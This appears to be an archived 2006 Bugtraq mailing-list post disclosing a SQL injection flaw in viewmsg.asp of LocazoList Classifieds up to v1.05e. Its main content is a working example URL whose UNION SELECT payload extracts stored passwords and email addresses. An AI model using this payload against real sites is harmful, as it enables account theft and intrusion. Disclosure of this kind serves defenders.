Bugtraq: LocazoList Classifieds <= v1.05e(viewmsg.asp) Remote SQL Injection Vulnerability

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Bugtraq mailing list archives

LocazoList Classifieds <= v1.05e(viewmsg.asp) Remote SQL Injection Vulnerability

From: ajannhwt () hotmail com
Date: 5 Jun 2006 07:41:40 -0000

# Title  :   LocazoList Classifieds <= v1.05e(viewmsg.asp) Remote SQL Injection Vulnerability
# Author :   ajann

#Vulnerability;

$$$ http://[target]/[path]/viewmsg.asp?msgid= SQL TEXT

$$$ Example:

http://[target]/[path]/viewmsg.asp?msgid=-1%20union%20select%20epass,0,0,0,email,0,0,0,0,0,0,0,0,0,0%20from%20thing+where+msgid=X

Msgid= TopicID

By Date By Thread

Current thread:

LocazoList Classifieds <= v1.05e(viewmsg.asp) Remote SQL Injection Vulnerability ajannhwt (Jun 04)
- <Possible follow-ups>
- LocazoList Classifieds <= v1.05e(viewmsg.asp) Remote SQL Injection Vulnerability ajannhwt (Jun 05)